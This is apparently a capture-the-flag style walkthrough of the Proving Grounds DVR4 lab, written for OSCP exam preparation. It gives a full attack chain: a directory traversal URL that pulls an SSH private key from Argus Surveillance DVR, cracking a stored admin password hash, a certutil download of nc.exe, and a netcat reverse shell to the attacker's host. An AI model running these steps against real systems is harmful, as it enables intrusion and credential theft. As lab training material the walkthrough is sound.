Proving grounds:DVR4
Today we will take a look at Proving grounds: DVR4. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
49664/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown- Argus Surveillance DVR (8080)
The ssh port was open, I can get the user id_rsa. To learn the username:
http://192.168.249.179:8080/Users.html
http://192.168.249.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FViewer%2F.ssh%2Fid_rsa- Viewer
└─# chmod 400 id_rsa─# ssh Viewer@192.168.249.179 -i id_rsa
we found where the password is
C:\ProgramData\PY_Software\Argus Surveillance DVR>more DVRParams.ini
[Users]
— — — — — — — — — — -
LoginName0=Administrator — — — — — — — — — — — — -Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8 — — — — — — — — — — — — — —
Now let’s crack the password, there is an exploit for that.
Edit
# Change this :)
pass_hash = “ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8”Run
└─# python 50130.py#########################################
# _____ Surveillance DVR 4.0 #
# / _ \_______ ____ __ __ ______ #
# / /_\ \_ __ \/ ___\| | \/ ___/ #
# / | \ | \/ /_/ > | /\___ \ #
# \____|__ /__| \___ /|____//____ > #
# \/ /_____/ \/ #
# Weak Password Encryption #
############ @deathflash1411 ############[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:Unknown
Couldn’t find the last one, when I open the code and look inside, I only see that there are no symbols, so let’s check it one by one
First, we upload the nc.exe file
C:\ProgramData\PY_Software\Argus Surveillance DVR>certutil -urlcache -split -f http://192.168.49.249/nc.exe
**** Online ****
0000 …
e800
CertUtil: -URLCache command completed successfully.Run as administrator
C:\ProgramData\PY_Software\Argus Surveillance DVR>runas /env /profile /user:Administrator “C:\ProgramData\PY_Software\Argus Surveillance DVR\nc.exe -e cmd.exe 192.168.49.249 21”I checked one by one
14WatchD0g!14WatchD0g@14WatchD0g#14WatchD0g$14WatchD0g%Duzgun olan: 14WatchD0g$Enter the password for Administrator:
Attempting to start C:\ProgramData\PY_Software\Argus Surveillance DVR\nc.exe -e cmd.exe 192.168.49.249 21 as user “DVR4\Administrator” …
and boom
└─# nc -nvlp 21
listening on [any] 21 …
connect to [192.168.49.249] from (UNKNOWN) [192.168.249.179] 51075
Microsoft Windows [Version 10.0.19044.1645]
© Microsoft Corporation. All rights reserved.C:\ProgramData\PY_Software\Argus Surveillance DVR>whoami
whoami
dvr4\administrator
And now we are the system
“If you have any questions or comments, please do not hesitate to write. Have a good days”
